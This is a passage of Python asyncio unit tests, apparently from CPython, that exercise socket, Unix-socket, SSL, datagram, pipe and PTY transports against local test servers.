check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=support.LOOPBACK_TIMEOUT)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = self.loop.create_future()
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
